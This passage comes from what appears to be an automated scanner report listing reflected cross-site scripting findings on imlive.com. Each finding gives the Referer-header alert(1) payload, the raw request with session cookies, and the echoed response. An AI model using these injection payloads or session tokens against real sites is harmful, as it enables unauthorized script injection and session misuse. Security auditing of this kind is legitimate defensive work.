Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:47 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=9f31f'-alert(1)-'d8c094b7adb&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.949. http://imlive.com/homepagems3.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:14 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2BBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2FLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3D; expires=Sat, 03-May-2008 14:05:14 GMT; path=/
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OFAEMBCBCGCOCIDCNNFPADIH; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:05:15 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10285


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp&lr=1107816009&ud=0&pe=homepagems3.asp&rf=http://www.google.com/search?hl=en^q=e3d10'><script>alert(1)</script>76788ffdb68&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.950. http://imlive.com/hostmembers.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /hostmembers.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hostmembers.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:16 GMT
Connection: close
Content-Length: 10795
Vary: Accept-Encoding


<HTML>
   <HEAD>
       
       <TITLE>ImLive - Host Login</TITLE>
       
       <meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.951. http://imlive.com/live-sex-chats/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:05 GMT
Connection: close
Content-Length: 39949
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent
...[SNIP]...

4.952. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/adult-shows/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:41 GMT
Connection: close
Content-Length: 25196
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.953. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:23 GMT
Connection: close
Content-Length: 224507
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.954. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:34 GMT
Connection: close
Content-Length: 27209
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

4.955. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/hotspots/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:14 GMT
Connection: close
Content-Length: 40632
Vary: Accept-Encoding


